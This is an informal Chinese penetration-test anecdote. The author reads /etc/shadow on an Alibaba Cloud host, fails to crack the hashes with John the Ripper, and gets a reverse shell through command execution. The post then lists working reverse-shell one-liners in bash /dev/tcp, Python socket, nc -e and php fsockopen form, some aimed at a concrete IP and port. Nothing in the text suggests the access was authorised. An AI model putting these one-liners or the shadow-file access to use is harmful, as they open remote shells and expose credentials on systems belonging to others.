一次渗透经历吧
知产收集香港阿里云,单核4g
没想到可以查看,是不是可以查看/etc/shadow,看了这个有毒啊
最开始尝试**,上手john但不是弱密码,百度**hash,卧槽感觉这个加密无法
最后想了想命令执行反弹shell
公网ip 阿里云主机需要发放端口直接80端口反弹了,有可能你没打开,
·神奇的一幕发生了
Shell反弹成功还是system权限
其他反弹脚本
bash -i >& /dev/tcp/ip/port 0>&1
python -c “import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘ip’,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’-i’]);”
[[email protected] ~]# nc -e /bin/bash 192.168.1.146 7777
[[email protected] ~]# php -r ‘exec("/bin/bash -i >& /dev/tcp/192.168.1.146/7777");’
php -r ‘$sock=fsockopen(“ip”,port);exec("/bin/bash -i <&3 >&3 2>&3");’
[[email protected] ~]# php -r ‘$sock=fsockopen(“192.168.1.146”,7777);exec("/bin/bash -i <&3 >&3 2>&3");’